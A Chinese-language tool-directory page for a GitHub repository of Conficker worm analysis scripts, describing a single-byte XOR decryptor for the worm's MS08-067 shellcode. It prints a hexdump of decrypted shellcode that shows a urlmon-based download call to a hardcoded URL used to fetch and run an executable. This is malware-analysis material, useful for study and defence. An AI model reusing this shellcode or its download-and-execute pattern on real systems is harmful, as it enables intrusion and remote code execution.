Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Conflicker_analysis_scripts — 用于分析conflicker蠕虫的脚本,该蠕虫利用著名的netapi漏洞(CVE-2008-4250),即MS08-067 | Kitploit
工具/GitHubGitHub/thunderstrike9090/conflicker_analysis_scripts
漏洞分析漏洞利用逆向工程Shellcode恶意软件分析二进制分析
GitHubthunderstrike9090/conflicker_analysis_scripts

Conflicker_analysis_scripts

用于分析conflicker蠕虫的脚本,该蠕虫利用著名的netapi漏洞(CVE-2008-4250),即MS08-067

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
17年前尚未审核

蠕虫 Conflicker 分析脚本

conflicker_shellcode_decryptor.py - 对 conflicker/netapi 蠕虫使用的 shellcode 进行解密。它采用单字节 XOR 解密。

输出如下:

00000170 83 c6 07 e8 18 00 00 00 33 d2 52 52 8b cc 66 c7 |........3.RR..f.|
00000180 01 78 2e 51 ff 77 04 52 52 51 56 52 ff 37 ff e0 |.x.Q.w.RRQVR.7..|
00000190 ad 51 56 95 8b 4b 3c 8b 4c 0b 78 03 cb 33 f6 8d |.QV..K<.L.x..3..|
000001a0 14 b3 03 51 20 8b 12 03 d3 0f 00 c0 0f bf c0 c1 |...Q ...........|
000001b0 c0 07 32 02 42 80 3a 00 75 f5 3b c5 74 06 46 3b |..2.B.:.u.;.t.F;|
000001c0 71 18 72 db 8b 51 24 03 d3 0f b7 14 72 8b 41 1c |q.r..Q$.....r.A.|
000001d0 03 c3 8b 04 90 03 c3 5e 59 c3 60 a2 8a 76 26 80 |.......^Y.`..v&.|
000001e0 ac c8 75 72 6c 6d 6f 6e 00 99 23 5d d9 68 74 74 |..urlmon..#].htt|
000001f0 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 38 38 2e |p://192.168.188.|
00000200 32 3a 32 31 39 31 2f 78 6d 7a 69 00 89 97 ab bd |2:2191/xmzi.....|
00000210 a2 8d 89 94 b0 80 80 ae a5 a7 80 93 89 8d b4 a5 |................|
00000220 90 9c a7 93 87 97 a2 85 96 9c 90 94 95 9c a9 82 |................|

解密后的输出表明 shellcode 使用了 'urlmon.dll',其中 'URLDownloadToFile' 函数用于从解密缓冲区中指定的 URL 下载可执行文件。

下载工具